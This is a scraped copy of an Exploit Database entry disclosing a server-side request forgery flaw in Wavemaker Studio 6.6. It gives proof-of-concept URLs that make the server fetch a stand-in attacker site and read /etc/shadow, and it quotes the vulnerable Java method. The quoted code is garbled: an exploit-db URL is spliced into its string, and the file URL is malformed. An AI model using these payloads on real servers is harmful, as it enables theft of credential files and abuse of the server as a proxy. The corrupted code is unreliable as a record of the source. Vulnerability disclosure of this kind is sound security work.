Wavemaker Studio 6.6 – Server-Side Request Forgery

• Exploit Database
• 131 阅读

• 作者： Gionathan Reale
  日期： 2018-08-06
• 类别：

  • webapps
  平台：

  • java
• 来源：https://www.exploit-db.com/exploits/45158/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36

  # Exploit Title: Wavemaker Studio 6.6 - Server-Side Request Forgery (SSRF). # Exploit Author: Gionathan "John" Reale # Google Dork: N/A # Date: 2018-08-01 # Vendor Homepage: http://www.wavemaker.com/ # Software Link: https://github.com/cloudjee/wavemaker/blob/master/wavemaker/wavemaker-studio/ # Affected Version: 6.6 # Tested on: Parrot OS # CVE : 2019-8982 # Description # Wavemaker Studio 6.6 contains an exploitable unvaildated parameter allowing an # attacker to pass dangerous content to a victim via a phishing link. The vulnerability # can also be exploited to access sensitive data or to use the server hosting Wavemaker # as a form of HTTP proxy among other things. # Proof Of Concept http://xxxx.xxxxx:xxxx/wavemaker/studioService.download?method=getContent&inUrl=http://attackersite.com/ http://xxxx.xxxxx:xxxx/wavemaker/studioService.download?method=getContent&inUrl=file///etc/shadow   # Vulnerable Code # /wavemaker-studio/services/studioService/src/com/wavemaker/studio/StudioService.java   # Line 419-430 @ExposeToClient public String getContent(String inUrl) throws IOException { try { String str = getRemoteContent(inUrl); str = str.replace("<head>", "<head><base href=&apos;https://www.exploit-db.com/exploits/45158/" + inUrl + "&apos; /><base target=&apos;_blank&apos; /><script>top.studio.startPageIFrameLoaded();</script>"); return str; } catch (Exception e) { return ""; } }